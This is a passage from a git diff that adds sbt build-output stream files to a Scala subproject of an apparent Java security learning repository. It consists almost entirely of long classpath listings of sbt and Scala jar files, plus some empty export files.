y/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/main-settings_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sjson-new-core_2.12-0.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sbinary_2.12-0.5.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/error_prone_annotations-2.4.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/gigahorse-core_2.12-0.7.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/config-1.4.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/test-interface-1.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-persist_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/ivy-2.3.0-sbt-396a783bba347016e7fe30dacc60d355be607fe2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/actions_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sbt-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-library-2.12.19.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-terminal-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/gigahorse-apache-http_2.12-0.7.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/checker-qual-3.4.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/caffeine-2.8.5.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/librarymanagement-core_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-tracking_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/testing_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/log4j-core-2.17.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/test-agent-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/launcher-interface-1.4.3.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-apiinfo_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/log4j-slf4j-impl-2.17.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/tasks_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/file-tree-views-2.1.12.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/collections_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sjson-new-scalajson_2.12-0.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/task-system_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-lm-integration_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sjson-new-murmurhash_2.12-0.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/ssl-config-core_2.12-0.6.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/librarymanagement-ivy_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-terminal-jna-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-compile-core_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-cache_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-parser-combinators_2.12-1.1.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zero-allocation-hashing-0.16.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-terminal-jansi-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/run_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-core_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/reactive-streams-1.0.3.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-reflect-2.12.19.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jna-platform-5.13.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/disruptor-3.4.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/template-resolver-0.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-builtins-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-relation_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-compiler-2.12.19.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scripted-plugin_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/protocol_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-style-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/completion_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-compile_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-xml_2.12-2.3.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/ipcsocket-1.6.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/shaded-jawn-parser_2.12-1.3.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-classpath_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jsch-0.2.17.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-position_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/lm-coursier-shaded_2.12-2.1.4.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/compiler-interface-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/shaded-scalajson_2.12-1.0.0-M4.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-interface-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-classfile_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-native-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-logging_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jansi-2.4.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/shaded-apache-httpasyncclient-0.7.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/core-macros_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/logic_2.12-1.10.1.jar
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/compile/scalacOptions/_global/streams/out b/JavaSecurity/JDK/Scala1/project/target/streams/compile/scalacOptions/_global/streams/out
new file mode 100644
index 00000000..e69de29b
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/compile/unmanagedClasspath/_global/streams/export b/JavaSecurity/JDK/Scala1/project/target/streams/compile/unmanagedClasspath/_global/streams/export
new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/project/target/streams/compile/unmanagedClasspath/_global/streams/export
@@ -0,0 +1 @@
+
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/compile/unmanagedClasspath/_global/streams/out b/JavaSecurity/JDK/Scala1/project/target/streams/compile/unmanagedClasspath/_global/streams/out
new file mode 100644
index 00000000..e69de29b
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/compile/unmanagedJars/_global/streams/export b/JavaSecurity/JDK/Scala1/project/target/streams/compile/unmanagedJars/_global/streams/export
new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/project/target/streams/compile/unmanagedJars/_global/streams/export
@@ -0,0 +1 @@
+
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/runtime/dependencyClasspath/_global/streams/export b/JavaSecurity/JDK/Scala1/project/target/streams/runtime/dependencyClasspath/_global/streams/export
new file mode 100644
index 00000000..7078ef8f
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/project/target/streams/runtime/dependencyClasspath/_global/streams/export
@@ -0,0 +1 @@
+/Users/drunkbaby/Desktop/Codes/JavaSecurityLearning/JavaSecurity/JDK/Scala1/project/target/scala-2.12/sbt-1.0/classes:/Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-library.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-compiler.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-xml_2.12-2.2.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-reflect.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/main_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/io_2.12-1.10.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jna-5.13.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-persist-core-assembly-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/slf4j-api-1.7.36.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-2.14.7-sbt-9c3b6aca11c57e339441442bbf58e550cdfecb79.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/command_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-reader-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-collection-compat_2.12-2.11.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-control_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/log4j-api-2.17.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/compiler-bridge_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/main-settings_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sjson-new-core_2.12-0.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sbinary_2.12-0.5.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/error_prone_annotations-2.4.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/gigahorse-core_2.12-0.7.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/config-1.4.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/test-interface-1.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-persist_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/ivy-2.3.0-sbt-396a783bba347016e7fe30dacc60d355be607fe2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/actions_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sbt-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-library-2.12.19.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-terminal-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/gigahorse-apache-http_2.12-0.7.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/checker-qual-3.4.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/caffeine-2.8.5.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/librarymanagement-core_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-tracking_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/testing_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/log4j-core-2.17.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/test-agent-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/launcher-interface-1.4.3.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-apiinfo_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/log4j-slf4j-impl-2.17.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/tasks_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/file-tree-views-2.1.12.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/collections_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sjson-new-scalajson_2.12-0.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/task-system_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-lm-integration_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sjson-new-murmurhash_2.12-0.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/ssl-config-core_2.12-0.6.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/librarymanagement-ivy_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-terminal-jna-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-compile-core_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-cache_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-parser-combinators_2.12-1.1.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zero-allocation-hashing-0.16.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-terminal-jansi-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/run_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-core_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/reactive-streams-1.0.3.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-reflect-2.12.19.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jna-platform-5.13.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/disruptor-3.4.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/template-resolver-0.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-builtins-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-relation_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-compiler-2.12.19.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scripted-plugin_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/protocol_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-style-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/completion_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-compile_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-xml_2.12-2.3.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/ipcsocket-1.6.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/shaded-jawn-parser_2.12-1.3.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-classpath_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jsch-0.2.17.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-position_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/lm-coursier-shaded_2.12-2.1.4.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/compiler-interface-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/shaded-scalajson_2.12-1.0.0-M4.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-interface-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-classfile_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-native-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-logging_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jansi-2.4.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/shaded-apache-httpasyncclient-0.7.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/core-macros_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/logic_2.12-1.10.1.jar
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/runtime/exportedProducts/_global/streams/export b/JavaSecurity/JDK/Scala1/project/target/streams/runtime/exportedProducts/_global/streams/export
new file mode 100644
index 00000000..c9499290
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/project/target/streams/runtime/exportedProducts/_global/streams/export
@@ -0,0 +1 @@
+/Users/drunkbaby/Desktop/Codes/JavaSecurityLearning/JavaSecurity/JDK/Scala1/project/target/scala-2.12/sbt-1.0/classes
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/runtime/externalDependencyClasspath/_global/streams/export b/JavaSecurity/JDK/Scala1/project/target/streams/runtime/externalDependencyClasspath/_global/streams/export
new file mode 100644
index 00000000..840acb78
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/project/target/streams/runtime/externalDependencyClasspath/_global/streams/export
@@ -0,0 +1 @@
+/Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-library.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-compiler.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-xml_2.12-2.2.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-reflect.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/main_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/io_2.12-1.10.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jna-5.13.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-persist-core-assembly-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/slf4j-api-1.7.36.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-2.14.7-sbt-9c3b6aca11c57e339441442bbf58e550cdfecb79.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/command_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-reader-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-collection-compat_2.12-2.11.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-control_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/log4j-api-2.17.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/compiler-bridge_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/main-settings_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sjson-new-core_2.12-0.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sbinary_2.12-0.5.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/error_prone_annotations-2.4.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/gigahorse-core_2.12-0.7.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/config-1.4.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/test-interface-1.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-persist_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/ivy-2.3.0-sbt-396a783bba347016e7fe30dacc60d355be607fe2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/actions_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sbt-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-library-2.12.19.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-terminal-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/gigahorse-apache-http_2.12-0.7.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/checker-qual-3.4.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/caffeine-2.8.5.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/librarymanagement-core_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-tracking_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/testing_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/log4j-core-2.17.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/test-agent-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/launcher-interface-1.4.3.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-apiinfo_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/log4j-slf4j-impl-2.17.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/tasks_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/file-tree-views-2.1.12.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/collections_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sjson-new-scalajson_2.12-0.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/task-system_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-lm-integration_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sjson-new-murmurhash_2.12-0.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/ssl-config-core_2.12-0.6.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/librarymanagement-ivy_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-terminal-jna-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-compile-core_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-cache_2.12-1.10.1.j